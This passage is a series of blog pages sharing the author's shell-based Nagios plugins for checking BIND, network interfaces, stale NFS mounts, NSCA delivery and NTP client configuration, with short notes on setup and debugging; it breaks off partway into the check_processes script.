/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""


kilala.nl tags: , , ,

View or add comments (curr. 2)

Nagios script: check_named

2006-06-01 00:00:00

This script was written at the time I was hired by UPC / Liberty Global.

Basic monitor to check whether BIND is up and running. It checks for a number of processes and tries to perform a basic lookup using the localhost.

This script was quickly hacked together for my current customer, as a Q&D solution for their monitoring needs. It's no beauty, but it works. Written in ksh and tested with:

A Critical is sent if:

A) one or more of the required processes is not running, or

B) the script is unable to perform a basic lookup using the localhost.

UPDATE 19/06/2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!
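
Since the script takes no arguments, hooking it up is trivial. Through NRPE it's a one-liner like this (a sketch, assuming the plugin lives in the usual libexec directory):

command[check_named]=/usr/local/nagios/libexec/check_named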


#!/usr/bin/bash
#
# DNS / Named process monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of DTV Labs, Liberty Global, the Netherlands
# Last Modified: 19-06-2006
# 
# Usage: ./check_named
#
# Description:
# This plugin determines whether the named DNS server
# is running properly. It will check the following:
# * Are all required processes running?
# * Is it possible to make DNS requests?
#
# Limitations:
# Currently this plugin will only function correctly on Solaris systems.
#
# Output:
# The script returns a CRIT when the abovementioned criteria are
# not matched.
#

# Host OS check and warning message
if [ `uname` != "SunOS" ]
then
        echo "WARNING:"
        echo "This script was originally written for use on Solaris."
        echo "You may run into some problems running it on this host."
        echo ""
        echo "Please verify that the script works before using it in a"
        echo "live environment. You can easily disable this message after"
        echo "testing the script."
        echo ""
fi

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "Named DNS monitor plugin for Nagios"
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done

check_processes()
{
	PROCESS="0"
	if [ `ps -ef | grep named | grep -v grep | grep -v nagios | wc -l` -lt 1 ]; then 
		echo "NAMED NOK - One or more processes not running"
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_service()
{
	SERVICE=0
	nslookup www.google.com localhost >/dev/null 2>&1
	if [ $? -ne 0 ]; then SERVICE=1;fi

	if [ $SERVICE -eq 1 ]; then 
		echo "NAMED NOK - Unable to perform a DNS lookup through the localhost."
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_processes
check_service

echo "NAMED OK - Everything running like it should"
exitstatus=$STATE_OK
exit $exitstatus

kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_networking

2006-06-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

I couldn't find an easy way to check whether all interfaces of a host are up and running from the -inside-, so I wrote a Nagios plugin to do this.

Naturally you could also try to ping all of the IP addresses of all of these network cards, but this isn't always possible. Lord knows how many routing issues I had to fight through to get our current IP set monitored. I guess using this script is a bit easier :)

The script was tested on Redhat ES3, Mac OSX and Solaris. Its basic requirement is the Korn shell (due to some conversions happening inside the script). On Linux/RH you'll need mii-tool (and sudo) and on Solaris you'll need Perl (for one lousy piece of math :p ).
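
On the Linux side, the sudo requirement boils down to a single sudoers entry along these lines (a sketch; adjust the account name and path to your own setup):

# /etc/sudoers (edit with visudo)
nagios  ALL = (root) NOPASSWD: /sbin/mii-tool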

EDIT:

Oh! Just like my other recent Nagios scripts, check_networking comes with a debugging option. Set $DEBUG at the top of the file to anything larger than zero and the script will dump information at various stages of its execution.



#!/usr/bin/ksh
#
# Basic UNIX networking check script.
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide SYS, the Netherlands
# Last Modified: 22-06-2006
#
# Usage: ./check_networking
#
# Description:
#   This plugin determines whether the local host's network interfaces
# are all up and running like they should. It uses the following
# questions to determine this.
# * Does /sbin/mii-tool report any problems? (Linux only)
# * Are the gateways for each subnet pingable?
#
# Limitations:
# * I have no clue whether mii-tool is something specific to Redhat ES3,
#   or whether all Linii have it. 
# * Sudo access to mii-tool is required for the nagios account.
# * Perl is required on Solaris, to do just tiny bit of math.
# * KSH is required.
# * The script assumes that the first available IP from a subnet is the
#   router.
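#   For example: for an interface with address 192.168.10.37 and a netmask
#   of 255.255.255.0, the script derives the 192.168.10.0 network and will
#   ping 192.168.10.1 as the presumed gateway.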
#
# Output:
#   The script returns a CRIT when one of the criteria mentioned
# above is not matched.
#
# Other notes:
#   I wish I'd learn Perl. I'm sure that doing all of this stuff in Perl
# would have cut down on the size of this script tremendously. Ah well.
#   If you ever run into problems with the script, set the DEBUG variable
# to 1. I'll need the output the script generates to do troubleshooting.
# See below for details. 
#   I realise that all the debugging commands strewn throughout the script
# may make things a little harder to read. But in the end I'm sure it was
# well worth adding them. It makes troubleshooting so much easier. :3
#

# Enabling the following dumps information into DEBUGFILE at various
# stages during the execution of this script.
DEBUG="0"
DEBUGFILE="/tmp/foobar"


### REQUISITE NAGIOS USER INTERFACE STUFF ###

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

[ $DEBUG -gt 0 ] && rm $DEBUGFILE 

print_usage() {
        echo "Usage: $PROGNAME"
        echo "Usage: $PROGNAME --help"
}

print_help() {
        echo ""
        print_usage
        echo ""
        echo "Basic UNIX networking check plugin for Nagios"
        echo ""
        echo "This plugin not developped by the Nagios Plugin group."
        echo "Please do not e-mail them for support on this plugin, since"
        echo "they won't know what you're talking about :P"
        echo ""
        echo "For contact info, read the plugin itself..."
}

while test -n "$1"
do
        case "$1" in
          --help) print_help; exit $STATE_OK;;
          -h) print_help; exit $STATE_OK;;
          *) print_usage; exit $STATE_UNKNOWN;;
        esac
done


### SETTING UP THE ENVIRONMENT ###

# Host OS check and warning message
MIITOOL="0"
if [ -f /sbin/mii-tool ]
then
        MIITOOL="1"

        sudo /sbin/mii-tool >/dev/null 2>&1
        if [ $? -gt 0 ]
        then
                echo "ERROR: sudo permissions"
                echo ""
                echo "This script requires that the Nagios user account has"
                echo "sudo permissions for the mii-tool command. Currently it"
                echo "does not have these permissions. Please fix this."
                echo ""
                exit $STATE_UNKNOWN
        fi
fi


### SUB-ROUTINE DEFINITIONS ### 

function convert_base
{
        typeset -i${2:-16} x
        x=$1
        echo $x
}

function subnet_router
{
[ $DEBUG -gt 0 ] && echo "- Starting subnet_router -" >> $DEBUGFILE
    first="0"; second="0"; third="0"; fourth="0"
    first=`echo $1 | cut -c 1-8`; FIRST=`convert_base 2#$first 10`
[ $DEBUG -gt 0 ] && echo "First: $first $FIRST" >> $DEBUGFILE
    second=`echo $1 | cut -c 9-16`; SECOND=`convert_base 2#$second 10`
[ $DEBUG -gt 0 ] && echo "Second: $second $SECOND" >> $DEBUGFILE
    third=`echo $1 | cut -c 17-24`; THIRD=`convert_base 2#$third 10`
[ $DEBUG -gt 0 ] && echo "Third: $third $THIRD" >> $DEBUGFILE
    fourth=`echo $1 | cut -c 25-32`
    [ `echo $fourth|wc -c` -gt 1 ] || fourth="0"
    TEMPCOUNT=`echo $fourth | wc -c | awk '{print $1}'`
    let PADDING=9-$TEMPCOUNT 
[ $DEBUG -gt 0 ] && echo "Fourth: padding fourth with $PADDING zeroes" >> $DEBUGFILE
    i=1
    while ((i <= $PADDING));
    do
       fourth=$fourth"0" 
       let i=$i+1
    done
    FOURTH=`convert_base 2#$fourth 10`; let FOURTH=$FOURTH+1
[ $DEBUG -gt 0 ] && echo "Fourth: $fourth $FOURTH" >> $DEBUGFILE

    echo "$FIRST.$SECOND.$THIRD.$FOURTH"
}

gather_interfaces_linux()
{
[ $DEBUG -gt 0 ] && echo "- Starting gather_interfaces_linux -" >> $DEBUGFILE
    for INTF in `ifconfig -a | grep ^[a-z] | grep -v ^lo | awk '{print $1}'`
    do
	if [ `echo $INTF | grep : | wc -l` -gt 0 ]
	then
            export INTERFACES="`echo $INTF|awk -F: '{print $1}'` $INTERFACES"
	else
            export INTERFACES="$INTF $INTERFACES"
	fi
    done

    INTFCOUNT=`echo $INTERFACES | wc -w`
[ $DEBUG -gt 0 ] && echo "Interfaces: There are $INTFCOUNT interfaces: $INTERFACES." >> $DEBUGFILE
    if [ $INTFCOUNT -lt 1 ] 
    then
	echo "NOK - No active network interfaces."
	exit $STATE_CRITICAL
    fi
}

gather_interfaces_darwin()
{
[ $DEBUG -gt 0 ] && echo "- Starting gather_interfaces_darwin -" >> $DEBUGFILE
    for INTF in `ifconfig -a | grep ^[a-z] | grep -v ^gif | grep -v ^stf | grep -v ^lo | awk '{print $1}'`
    do
        [ `echo $INTF | grep : | wc -l` -gt 0 ] && INTF=`echo $INTF|awk -F: '{print $1}'`
	[ `ifconfig $INTF | grep "status: inactive" | wc -l` -gt 0 ] && continue
        INTERFACES="$INTF $INTERFACES" 
    done

    INTFCOUNT=`echo $INTERFACES | wc -w`
[ $DEBUG -gt 0 ] && echo "Interfaces: There are $INTFCOUNT interfaces: $INTERFACES." >> $DEBUGFILE
    if [ $INTFCOUNT -lt 1 ] 
    then
	echo "NOK - No active network interfaces."
	exit $STATE_CRITICAL
    fi
}

gather_gateway_linux()
{
[ $DEBUG -gt 0 ] && echo "- Starting gather_gateway_linux for interface $1 -" >> $DEBUGFILE
    MASKBIN=""
    MASK=`ifconfig $1 | grep Mask | awk '{print $4}' | awk -F: '{print $2}'` 
    for PART in `echo $MASK | awk -F. '{print $1" "$2" "$3" "$4}'`
    do
        MASKBIN="$MASKBIN`convert_base $PART 2  | awk -F# '{print $2}'`"
    done
[ $DEBUG -gt 0 ] && echo "Mask: $MASK $MASKBIN" >> $DEBUGFILE

        BITCOUNT=`echo $MASKBIN | grep -o 1 | wc -l | awk '{print $1}'`

[ $DEBUG -gt 0 ] && echo "Bitcount: $BITCOUNT" >> $DEBUGFILE

    IPBIN=""
    IP=`ifconfig $1 | grep "inet addr" | awk '{print $2}' | awk -F: '{print $2}'` 
    for PART in `echo $IP | awk -F. '{print $1" "$2" "$3" "$4}'`
    do
        TEMPBIN=`convert_base $PART 2 | awk -F# '{print $2}'`
        TEMPCOUNT=`echo $TEMPBIN | wc -c | awk '{print $1}'`
        let PADDING=9-$TEMPCOUNT
        i=1
        while ((i <= $PADDING));
        do
            IPBIN=$IPBIN"0" 
            let i=$i+1
        done
        IPBIN=$IPBIN$TEMPBIN
    done
[ $DEBUG -gt 0 ] && echo "IP address: $IP $IPBIN" >> $DEBUGFILE

    CUT="1-$BITCOUNT"
[ $DEBUG -gt 0 ] && echo "Cutting: Cutting chars $CUT" >> $DEBUGFILE
    NETBIN=`echo $IPBIN | cut -c $CUT`
[ $DEBUG -gt 0 ] && echo "Netbin: $NETBIN" >> $DEBUGFILE
    ROUTER=`subnet_router $NETBIN`
[ $DEBUG -gt 0 ] && echo "Router: $ROUTER" >> $DEBUGFILE
    echo $ROUTER
}

gather_gateway_darwin()
{
[ $DEBUG -gt 0 ] && echo "- Starting gath_gateway_darwin for interface $1 -" >> $DEBUGFILE
    MASKBIN=""
    [ `uname` == "Darwin" ] && MASK=`ifconfig $1 | grep netmask | awk '{print $4}' | awk -Fx '{print $2}'`
    [ `uname` == "SunOS" ] && MASK=`ifconfig $1 | grep netmask | awk '{print $4}'`
    for PART in `echo 1 3 5 7`
    do
	let PLUSPART=$PART+1
	MASKPART=`echo $MASK | cut -c $PART-$PLUSPART`
        MASKBIN="$MASKBIN`convert_base 16#$MASKPART 2  | awk -F# '{print $2}'`"
    done
[ $DEBUG -gt 0 ] && echo "Mask: $MASK $MASKBIN" >> $DEBUGFILE

    BITCOUNT=`echo $MASKBIN | grep -o 1 | wc -l | awk '{print $1}'`
[ $DEBUG -gt 0 ] && echo "Bitcount: $BITCOUNT" >> $DEBUGFILE

    IPBIN=""
    IP=`ifconfig $1 | grep "inet " | awk '{print $2}'`
    for PART in `echo $IP | awk -F. '{print $1" "$2" "$3" "$4}'`
    do
        TEMPBIN=`convert_base $PART 2 | awk -F# '{print $2}'`
        TEMPCOUNT=`echo $TEMPBIN | wc -c | awk '{print $1}'`
        let PADDING=9-$TEMPCOUNT
        i=1
        while ((i <= $PADDING));
        do
            TEMPBIN="0"$TEMPBIN
            let i=$i+1
        done
        IPBIN=$IPBIN$TEMPBIN
    done
[ $DEBUG -gt 0 ] && echo "IP address: $IP $IPBIN" >> $DEBUGFILE

    CUT="1-$BITCOUNT"
[ $DEBUG -gt 0 ] && echo "Cutting: cutting chars $CUT" >> $DEBUGFILE
    NETBIN=`echo $IPBIN | cut -c $CUT`
[ $DEBUG -gt 0 ] && echo "Netbin: $NETBIN" >> $DEBUGFILE
    ROUTER=`subnet_router $NETBIN`
[ $DEBUG -gt 0 ] && echo "Router: $ROUTER" >> $DEBUGFILE
    echo $ROUTER
}

gather_gateway_sunos()
{
[ $DEBUG -gt 0 ] && echo "- Starting gath_gateway_solaris for interface $1 -" >> $DEBUGFILE
    MASKBIN=""
    [ `uname` == "Darwin" ] && MASK=`ifconfig $1 | grep netmask | awk '{print $4}' | awk -Fx '{print $2}'`
    [ `uname` == "SunOS" ] && MASK=`ifconfig $1 | grep netmask | awk '{print $4}'`
    for PART in `echo 1 3 5 7`
    do
        let PLUSPART=$PART+1
        MASKPART=`echo $MASK | cut -c $PART-$PLUSPART`
        MASKBIN="$MASKBIN`convert_base 16#$MASKPART 2  | awk -F# '{print $2}'`"
    done
[ $DEBUG -gt 0 ] && echo "Mask: $MASK $MASKBIN" >> $DEBUGFILE

# This piece of kludge also requires that all tabs are removed from the beginning of each line.
# Additional character needed to trick the counter below
# Shitty thing is that it doesn't work. Stupid "let" aryth engine...
#MASKBIN="$MASKBIN-"
#[ $DEBUG -gt 0 ] && echo "Bitcount: kludged binmask is $MASKBIN" >> $DEBUGFILE
#
#IFS="1"
#read TEMP << EOT
#echo $MASKBIN
#EOT
#let "BITCOUNT=(${#TEMP[@]} - 1)"
#IFS=" "

# The kludge above was replaced by this one line of Perl. 

    BITCOUNT=`echo $MASKBIN | perl -ne 'while(/1/g){++$count}; print "$count"'`
[ $DEBUG -gt 0 ] && echo "Bitcount: $BITCOUNT" >> $DEBUGFILE

    IPBIN=""
    IP=`ifconfig $1 | grep "inet " | awk '{print $2}'`
    for PART in `echo $IP | awk -F. '{print $1" "$2" "$3" "$4}'`
    do
[ $DEBUG -gt 0 ] && echo "IP part: converting part $PART" >> $DEBUGFILE
        TEMPBIN=`convert_base $PART 2 | awk -F# '{print $2}'`
[ $DEBUG -gt 0 ] && echo "IP part: converted part is $TEMPBIN" >> $DEBUGFILE
        TEMPCOUNT=`echo $TEMPBIN | wc -c | awk '{print $1}'`
[ $DEBUG -gt 0 ] && echo "IP part: this part is $TEMPCOUNT chars long." >> $DEBUGFILE
        let PADDING=9-$TEMPCOUNT
[ $DEBUG -gt 0 ] && echo "IP part: will be padded with $PADDING zeroes" >> $DEBUGFILE
        i=1
        while ((i <= $PADDING));
        do
            TEMPBIN="0"$TEMPBIN
            let i=$i+1
        done
        IPBIN=$IPBIN$TEMPBIN
    done
[ $DEBUG -gt 0 ] && echo "IP address: $IP $IPBIN" >> $DEBUGFILE

    CUT="1-$BITCOUNT"
[ $DEBUG -gt 0 ] && echo "Cutting: cutting chars $CUT" >> $DEBUGFILE
    NETBIN=`echo $IPBIN | cut -c $CUT`
[ $DEBUG -gt 0 ] && echo "Netbin: $NETBIN" >> $DEBUGFILE
    ROUTER=`subnet_router $NETBIN`
[ $DEBUG -gt 0 ] && echo "Router: $ROUTER" >> $DEBUGFILE
    echo $ROUTER
}

check_miitool()
{
[ $DEBUG -gt 0 ] && echo "- Starting check_miitool -" >> $DEBUGFILE
    COUNT="0"
    for INTF in `echo $INTERFACES`
    do
        [ `sudo /sbin/mii-tool $INTF | head -1 | grep -c ok` -gt 0 ] || let COUNT=$COUNT+1
        [ `sudo /sbin/mii-tool $INTF | head -1 | grep -c 100baseTx-FD` -gt 0 ] || let COUNT=$COUNT+1
        [ `sudo /sbin/mii-tool $INTF | head -1 | grep -c 1000baseTx-FD` -gt 0 ] || let COUNT=$COUNT+1
    done

    [ $COUNT -gt $INTFCOUNT ] && { echo "NOK - Problem with one of the interfaces"; exit $STATE_CRITICAL; }
}

check_ping()
{
[ $DEBUG -gt 0 ] && echo "- Starting check_ping -" >> $DEBUGFILE
    INTF=""
    for INTF in `echo $INTERFACES`
    do
	case `uname` in
	    Linux) GATEWAY=`gather_gateway_linux $INTF`;;
	    Darwin) GATEWAY=`gather_gateway_darwin $INTF`;;
	    SunOS) GATEWAY=`gather_gateway_sunos $INTF`;;
	    *) echo "OS not supported by this check."; exit 1;;
	esac
[ $DEBUG -gt 0 ] && echo "Gateway: $GATEWAY" >> $DEBUGFILE

 	ping -c 3 $GATEWAY >/dev/null 2>&1
        if [ $? -gt 0 ] 
        then
            echo "NOK - Problem pinging gateway $GATEWAY"; exit $STATE_CRITICAL
        fi
    done
}


### THE MAIN ROUTINE FINALLY STARTS ###

case `uname` in
            Linux) gather_interfaces_linux;;
            Darwin) gather_interfaces_darwin;;
            #SunOS) gather_interfaces_sunos;;
            SunOS) gather_interfaces_linux;;
            *) echo "OS not supported by this check."; exit 1;;
        esac

[ $MIITOOL -eq 1 ] && check_miitool

check_ping

# None of the other subroutines forced us to exit 1 before here, so let's quit with a 0.
echo "OK - Everything running like it should"
exit $STATE_OK


kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_nfs_stale

2006-06-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

There really isn't much to say... This script is so fscking basic that it shames me to even put it up here among all the other projects.


#!/usr/bin/bash
#
# NFS stale mounts monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide, the Netherlands
# Last Modified: 13-07-2006
# 
# Usage: ./check_nfs_stale
#
# Description:
# This script couldn't be simpler than it is. It just checks to see
# whether there are any stale NFS mounts present on the system. 
#
# Limitations:
#   This script should work properly on all implementations of Linux, Solaris
# and Mac OS X.
#
# Output:
# If there are stale NFS mounts, a CRIT is issued.
#

# You may have to change this, depending on where you installed your
# Nagios plugins
PROGNAME="check_nfs_stale"
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh


### REQUISITE NAGIOS COMMAND LINE STUFF ###

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "NFS stale mounts monitor plugin for Nagios"
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done

# Note: df typically reports stale handles on stderr, hence the 2>&1.
[ `df -k 2>&1 | grep "Stale NFS file handle" | wc -l` -gt 0 ] && { echo "NOK - Stale NFS mounts."; exit $STATE_CRITICAL; }

# Nothing caused us to exit early, so we're okay.
echo "OK - No stale NFS mounts."
exit $STATE_OK


kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_nsca

2006-06-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

At $CLIENT we've often run into problems with the NSCA daemon, where the daemon would not crash per se, but where it would also not process incoming service checks. The nsca process was still running, but it simply wasn't transferring the incoming results to the Nagios command file.

I was amazed to find that nobody else had written a script to do this! So I quickly wrote one.
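
If you would like to run the same test by hand, the lines below mirror what the plugin does internally. The paths, the localhost target and the FOOBAR service name are simply the values assumed by the script, so adjust them to your own installation.

# Inject a bogus passive result for service "FOOBAR" on this host, just like check_nsca does...
printf "`hostname`\tFOOBAR\t0\tmanual NSCA test\n" | /usr/local/nagios/bin/send_nsca -H localhost -c /usr/local/nagios/etc/send_nsca.cfg
# ...then check whether Nagios logged it.
tail -1000 /usr/local/nagios/var/nagios.log | grep "manual NSCA test"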


#!/usr/bin/bash
#
# NSCA Nagios service results monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide, the Netherlands
# Last Modified: 16-08-2006
# 
# Usage: ./check_nsca
#
# Description:
# Aside from checking whether the NSCA process is still running, this script
# also attempts to insert a message into the Nagios queue. After sending a 
# message to the NSCA daemon, it will verify that the message is received by
# Nagios, by checking the nagios.log file. 
#
# Limitations:
#   This script should work properly on all implementations of Linux, Solaris
# and Mac OS X.
#
# Output:
# If the NSCA daemon, or something along the message path, is borked, a 
# CRIT message will be issued. 
#

# You may have to change this, depending on where you installed your
# Nagios plugins
PROGNAME="check_nsca"
PATH="/usr/bin:/usr/sbin:/bin:/sbin"

NAGIOSHOME="/usr/local/nagios"
LIBEXEC="$NAGIOSHOME/libexec"
NAGVAR="$NAGIOSHOME/var"
NAGBIN="$NAGIOSHOME/bin"
NAGETC="$NAGIOSHOME/etc"

. $LIBEXEC/utils.sh


### REQUISITE NAGIOS COMMAND LINE STUFF ###

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "NSCA Nagios service results monitor plugin for Nagios"
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done


### PLATFORM INDEPENDENCE ###

case `uname` in
	Linux) PSLIST="ps -ef";;
	SunOS) PSLIST="ps -ef";;
	Darwin) PSLIST="ps -ajx";;
	*) ;;
    esac


### CHECKING FOR THE NSCA PROCESS ###

[ `$PSLIST | grep nsca | grep -v grep | wc -l` -lt 1 ] && { echo "NSCA process not running."; exit $STATE_CRITICAL; }


### INSERTING A TEST MESSAGE ###

DATE=`date +%Y%m%d%H%M`
STRING="`hostname`\tFOOBAR\t0\t$DATE This is a test of the emergency broadcast system.\n"

echo -e "$STRING" | $NAGBIN/send_nsca -H localhost -c $NAGETC/send_nsca.cfg >/dev/null 2>&1


### CHECKING THE NAGIOS LOG FILE ###

sleep 10

if [ `tail -1000 $NAGVAR/nagios.log | grep "emergency broadcast system" | grep $DATE | wc -l` -lt 1 ] 
then
	# Giving it a second try
	sleep 10
	if [ `tail -5000 $NAGVAR/nagios.log | grep "emergency broadcast system" | grep $DATE | wc -l` -lt 1 ]	
	then
		echo "NSCA daemon not processing check results."
		exit $STATE_CRITICAL
	fi
fi


### EXITING NORMALLY ###

echo "OK - NSCA working like it should."
exit $STATE_OK


kilala.nl tags: , , ,

View or add comments (curr. 2)

Nagios script: check_ntp_config

2006-06-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

As far as I know there was no Nagios plugin that allowed you to really check your client configuration. I mean, it would be nice to know for sure that all your systems are syncing against the proper server... Wouldn't it?

The script was tested on Redhat ES3, Mac OS X and Solaris. Its basic requirement is the bash shell.

EDIT:

Oh! Just like my other recent Nagios scripts, check_ntp_config comes with a debugging option. Set $DEBUG at the top of the file to anything larger than zero and the script will dump information at various stages of its execution.
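
For reference: the check simply greps the "server" line from the client's NTP configuration and compares it against the host name (or resolved IP address) defined in $NTP_SERVER at the top of the script. So a client config that passes the check would contain something like this hypothetical, minimal excerpt:

# /etc/ntp.conf (the script looks at /etc/inet/ntpd.conf on Solaris)
server ntp.wxs.nl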



#!/usr/bin/bash
#
# NTP client configuration monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide, the Netherlands
# Last Modified: 10-07-2006
# 
# Usage: ./check_ntp_config
#
# Description:
#   Well, there's not much to tell. We have no way of making sure that our 
# NTP clients are all configured in the right way, so I thought I'd make
# a Nagios check for it. ^_^ 
#   You can change the NTP config at the top of this script, to match your
# own situation.
#
# Limitations:
#   This script should work properly on all implementations of Linux, Solaris
# and Mac OS X.
#
# Output:
#   If the NTP client config does not match what has been defined at the 
# top of this script, the script will return a WARN.
#
# Other notes:
#   If you ever run into problems with the script, set the DEBUG variable
# to 1. I'll need the output the script generates to do troubleshooting.
# See below for details.
#   I realise that all the debugging commands strewn throughout the script
# may make things a little harder to read. But in the end I'm sure it was
# well worth adding them. It makes troubleshooting so much easier. :3
#

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh


### DEFINING THE NTP CLIENT CONFIGURATION AS IT SHOULD BE ###
NTP_SERVER="ntp.wxs.nl"


### DEBUGGING SETUP ###
# Cause you never know when you'll need to squash a bug or two
DEBUG="0"

if [ $DEBUG -gt 0 ]
then
        DEBUGFILE="/tmp/foobar"
        rm $DEBUGFILE >/dev/null 2>&1
fi


### REQUISITE NAGIOS COMMAND LINE STUFF ###

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "NTP client configuration monitor plugin for Nagios"
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done


### DEFINING SUBROUTINES ###

function gather_config()
{
    case `uname` in
	Linux) CFGFILE="/etc/ntp.conf"; IP_SERVER=`host $NTP_SERVER | awk '{print $4}'` ;;
	SunOS) CFGFILE="/etc/inet/ntpd.conf"; IP_SERVER=`getent hosts $NTP_SERVER | awk '{print $1}'`;;
	Darwin) CFGFILE="/etc/ntp.conf"; IP_SERVER=`host $NTP_SERVER | awk '{print $4}'` ;;
	*) ;;
    esac

    REAL_SERVER=`cat $CFGFILE | grep ^server | awk '{print $2}'`

[ $DEBUG -gt 0 ] && echo "Gather_config: Host name for required server is $NTP_SERVER." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Gather_config: IP address for required server is $IP_SERVER." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Gather_config: currently configured server is $REAL_SERVER." >> $DEBUGFILE
} 

function check_config()
{
    if [ $REAL_SERVER != $NTP_SERVER ]
    then
	if [ $REAL_SERVER != $IP_SERVER ]
	then
	    echo "NOK - NTP client is not configured to speak to $NTP_SERVER"
	    exit $STATE_WARNING
     	fi
    fi
}


### FINALLY, THE MAIN ROUTINE ###

gather_config
check_config

# Nothing caused us to exit early, so we're okay.
echo "OK - NTP client configured correctly."
exit $STATE_OK


kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_processes

2006-06-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

A very simple script that takes a list of processes, instead of a single process name (as is the case with check_process). This should make monitoring a basic list of processes a lot easier. I really should change the script in such a way that it takes the process list from the command line, instead of from the $LIST variable that's defined internally. I'll do that when I have the time.

Until I've made those changes, I use the script by copying check_processes to a new file which is used specifically for one purpose. For example check_linux_processes and check_solaris_processes check a list of processes that should be up and running on Linux and Solaris respectively.

This check script should work on just about any UNIX OS.
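
Until I get around to that rewrite, here's a rough, hypothetical sketch of what the command-line variant could look like; it simply overrides the internal $LIST variable when arguments are given (the process names in the example are placeholders):

# Take the process list from the command line when given,
# e.g.: ./check_processes sshd crond syslogd
# Otherwise fall back to the built-in $LIST.
if [ $# -ge 1 ]
then
        LIST="$*"
fi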



#!/bin/bash
#
# Process monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide, the Netherlands
# Last Modified: 13-07-2006
# 
# Usage: ./check_solaris_processes
#
# Description:
# This script couldn't be simpler than it is. It just checks to see
# whether a predefined list of processes is up and running. 
#
# Limitations:
#   This script should work properly on all implementations of Linux, Solaris
# and Mac OS X.
#
# Output:
# If one of the processes is down, a CRIT is issued.
#

# You may have to change this, depending on where you installed your
# Nagios plugins
PROGNAME="check_linux_processes"
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh


### DEFINING THE PROCESS LIST ###
LIST="init"


### REQUISITE NAGIOS COMMAND LINE STUFF ###

print_usage() {
        echo "Usage: $PROGNAME"
        echo "Usage: $PROGNAME --help"
}

print_help() {
        echo ""
        print_usage
